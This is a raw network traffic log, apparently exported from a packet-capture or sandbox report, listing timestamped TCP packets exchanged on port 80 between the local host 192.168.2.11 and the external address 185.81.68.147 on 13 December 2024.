                                                                                                                                                                                                Dec 13, 2024 08:20:08.242569923 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.242674112 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.242716074 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.244371891 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.244488001 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.244527102 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.244527102 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.246213913 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.246260881 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.246344090 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.246395111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.248024940 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.248095989 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.248161077 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.248238087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.249830961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.249892950 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.249974966 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.250581026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.251594067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.251668930 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.251714945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.251770973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.253354073 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.253423929 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.253436089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.253482103 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.255069017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.255111933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.255198002 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.255258083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.256763935 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.256813049 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.256874084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.256917953 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.258430004 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.258474112 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.258541107 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.258582115 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.260135889 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.260201931 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.260262012 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.260310888 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.261774063 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.261861086 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.261862040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.261900902 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.263406992 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.263453960 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.263520956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.263566017 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.265033960 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.265125036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.265136003 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.265172958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.266653061 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.266679049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.266712904 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.266737938 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.268233061 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.268326998 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.268338919 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.268382072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.269874096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.269920111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.269952059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.269998074 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.271384954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.271449089 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.271563053 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.271606922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.272960901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.273016930 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.273093939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.273144960 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.274530888 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.274574041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.274600029 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.274636030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.276108980 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.276153088 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.276202917 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.276202917 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.277546883 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.277662039 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.277714014 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.279071093 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.279139042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.279176950 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.279226065 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.280630112 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.280689955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.280791998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.280846119 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.282130957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.282179117 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.282202959 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.282272100 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.283546925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.283610106 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.283647060 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.283689976 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.285072088 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.285125017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.285135031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.285167933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.286514997 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.286581993 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.286612988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.286688089 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.287981987 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.288060904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.288068056 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.288100958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.289388895 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.289439917 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.289478064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.289520979 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.290936947 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.290997028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.291013956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.291079998 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.292272091 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.292318106 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.292459011 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.292499065 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.293689966 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.293740988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.293828964 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.293867111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.295150995 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.295176029 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.295195103 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.295217037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.296540976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.296672106 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.296685934 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.296717882 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.297949076 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.298022032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.298063993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.298108101 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.299457073 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.299510002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.299576998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.299645901 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.300848961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.300916910 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.300926924 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.300970078 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.302259922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.302316904 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.302346945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.302390099 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.303668022 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.303715944 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.303852081 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.303894043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.305211067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.305298090 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.305296898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.305355072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.306483030 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.306545019 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.306581020 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.306629896 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.307984114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.308037043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.308075905 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.308115959 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.309346914 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.309417963 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.309437990 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.309479952 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.310776949 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.310926914 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.310975075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.312180996 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.312232018 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.312294960 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.312433004 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.313766956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.313831091 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.313878059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.313924074 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.315041065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.315085888 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.315162897 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.315370083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.316450119 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.316560984 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.316607952 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.317859888 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.317905903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.317934990 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.317970037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.319443941 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.319511890 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430438995 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430458069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430496931 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430531025 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430636883 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430671930 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430802107 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.430839062 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.431701899 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.431745052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.431802988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.431839943 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.432730913 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.432785988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.432848930 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.432887077 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.433758974 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.433799982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.433866024 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.433913946 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.434798956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.434849977 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.434899092 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.434940100 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.435791969 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.435837984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.435909033 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.435954094 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.436822891 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.436883926 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.436920881 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.436963081 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.437814951 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.437855005 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.437972069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.438014030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.438844919 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.438926935 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.438945055 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.438987970 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.439825058 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.439862967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.439901114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.439939022 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.440814972 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.440866947 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.440927982 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.440964937 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.441792965 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.441848040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.441879034 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.441914082 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.442751884 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.442790985 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.442861080 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.442895889 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.443766117 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.443813086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.443862915 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.443902016 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.444724083 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.444763899 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.444856882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.444894075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.445703030 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.445748091 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.445817947 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.445856094 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.446701050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.446738005 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.446820021 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.446856022 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.447668076 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.447706938 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.447784901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.447823048 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.448673010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.448708057 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.448786020 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.448829889 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.449726105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.449769020 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.449800014 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.449836016 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.450656891 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.450694084 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.450778961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.450817108 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.451662064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.451795101 CET8049938185.81.68.147192.168.2.11
